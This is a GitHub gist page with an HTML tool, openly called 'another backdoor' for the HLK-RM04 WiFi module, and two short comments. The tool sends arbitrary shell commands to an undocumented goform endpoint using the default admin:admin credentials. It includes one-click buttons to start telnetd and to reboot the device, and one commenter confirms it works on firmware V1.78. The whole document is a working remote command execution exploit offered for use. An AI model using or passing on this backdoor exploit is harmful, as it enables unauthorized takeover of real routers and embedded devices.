Created

Embed URL

HTTPS clone URL

SSH clone URL

You can clone with HTTPS or SSH.

Download Gist

Another backdoor for the rm04, need I say any more?

View rm04-tool.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
<html>
<head>
<title>HLK-RM04 Tool</title>
<style>
form {
display: inline;
}
</style>
 
</head>
<body>
<h1>HLK-RM04 Tool</h1>
 
<b>Shell command:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="text" name="command" size=40 /><input type="submit" value="Run" />
</form>
 
<hr />
 
<b>Quick actions:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="telnetd" /><input type="submit" value="Start telnetd" />
</form>
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="reboot" /><input type="submit" value="Reboot" />
</form>
 
<iframe src="about:blank" name="frame" width="0" height="0" frameborder="0"></iframe>
</body>
</html>

Hi!

Not works for me. Firmware V1.78(Jul 23 2013)

Do you remember how to find action url in device's filesystem?

I have the same version and it works perfect. I jusst changed the three IP addresses in the file to the one of my module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.